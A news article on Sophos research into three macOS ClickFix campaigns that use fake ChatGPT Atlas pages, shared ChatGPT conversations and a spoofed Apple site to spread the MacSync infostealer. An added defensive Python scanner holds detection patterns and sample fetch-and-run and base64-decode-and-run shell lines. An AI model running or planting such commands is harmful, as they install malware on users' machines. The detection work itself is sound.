- Sophos warns of more macOS ClickFix campaigns
- Fake AI tools, ChatGPT conversations and Apple website used to spread MacSync infostealer
- Latest variant uses loaders, AppleScript and in-memory execution for stealth
Security researchers have warned of an increase in ongoing malware campaigns targeting macOS users, leveraging malicious ads, legitimate hosting services, brand impersonation, fake ChatGPT conversations and a little old-fashioned social engineering to infect victims.
A new report from Sophos claims at least three different ClickFix campaigns have been running over the past three months. ClickFix is a known technique in which crooks present users with a fake problem – anything from a fake CAPTCHA to a “locked” document – and at the same time offer a solution.
Whatever it is, “fixing” the problem requires running a Terminal command which downloads and installs MacSync infostealer.
MacOS a frequent target
In the first campaign, the “problem” was installing an AI browser. Users searching for a specific keyword would see an ad at the top of Google search results, which would lead to a fake browser download page hosted on sites.google.com.
The site looks authentic and spoofs OpenAI’s ChatGPT Atlas – but to download, users are asked to open the Terminal and paste a specific command.
The second campaign is somewhat different because instead of relying on a website, the crooks would set up a ChatGPT conversation.
Each conversation with the tool has a unique identifier and can be shared with other people using the “share” feature. The crooks would create a conversation with instructions for downloading “Mac system cleaner apps” and similar tools, which would in turn trick victims into downloading the infostealer. They would then advertise that conversation on Google to improve its perceived legitimacy.
The third campaign described in the Sophos report impersonates the legitimate Apple website and delivers a significantly evolved variant of the MacSync infostealer. Unlike the previous campaigns, this one uses a multi-stage loader-as-a-service model, dynamic AppleScript payloads, and in-memory execution to maximize stealth and persistence.
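As an added example (not code from the Sophos report or from TechRadar), here is a small Python checker a defender might run over a shell history file to flag ClickFix-style pasted one-liners of the kind described above: remote content piped straight into a shell, base64-decoded payloads, and inline AppleScript via osascript. The indicator patterns and the sample history lines are constructed for illustration and are not real campaign commands.

```python
import re
from typing import List, Pattern, Tuple

# Heuristic indicators of a pasted "fix" command on macOS (constructed for this example).
# Each entry is (label, regex); a real deployment would tune these against local baselines.
INDICATORS: List[Tuple[str, Pattern]] = [
    ("remote_fetch_piped_to_shell",
     re.compile(r"\b(curl|wget|base64)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b")),
    ("base64_decoded_payload", re.compile(r"base64\s+(-d|--decode|-D)\b")),
    ("inline_applescript", re.compile(r"\bosascript\s+-e\b")),
    ("eval_of_dynamic_content", re.compile(r"\beval\s+[\"'$(]")),
]


def score_command(cmd: str) -> List[str]:
    """Return the labels of every indicator that matches one history line."""
    return [label for label, rx in INDICATORS if rx.search(cmd)]


def scan_history(lines: List[str], min_hits: int = 1) -> List[Tuple[str, List[str]]]:
    """Scan bash/zsh history lines and return (command, labels) for suspicious ones.

    zsh extended history prefixes each entry with ': <timestamp>:<duration>;',
    which is stripped before matching; plain bash history lines pass through unchanged.
    """
    findings = []
    for raw in lines:
        cmd = re.sub(r"^: \d+:\d+;", "", raw).strip()
        hits = score_command(cmd)
        if len(hits) >= min_hits:
            findings.append((cmd, hits))
    return findings


# Constructed sample history: two benign lines, one fetch-and-run one-liner,
# one base64-decode-and-run line, and one inline AppleScript launcher.
SAMPLE_HISTORY = [
    ": 1700000000:0;brew update && brew upgrade",
    ": 1700000100:0;curl -fsSL https://example.invalid/install.sh | bash",
    ": 1700000200:0;echo 'ZWNobyBoaQ==' | base64 -D | sh",
    ": 1700000300:0;osascript -e 'display dialog \"Update required\"'",
    "ls -la ~/Downloads",
]

if __name__ == "__main__":
    for cmd, labels in scan_history(SAMPLE_HISTORY):
        print(f"{', '.join(labels)}: {cmd}")
```

To run it against a real machine, read `~/.zsh_history` or `~/.bash_history` into the list instead of `SAMPLE_HISTORY`; a hit is a lead for triage, not proof of infection.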
“The prevailing wisdom used to be that macOS had a lower risk of malware infection compared to Windows, due to a built-in suite of security features that forced threat actors to employ different, sometimes technically challenging, techniques,” the researchers explained.
“That’s no longer the case (and hasn’t been for some time, as we noted in September 2024). Mainstream malware now regularly affects macOS users – especially when it comes to infostealers, which regularly account for a significant portion of all the macOS detections we see in telemetry. We expect this region of the threat landscape to continue to evolve, but as always, we will evolve with it, and it will evolve quickly. We will continue to monitor for new variants, update protection and detection information as needed, and publish research on this aspect of the threat landscape as data becomes available.”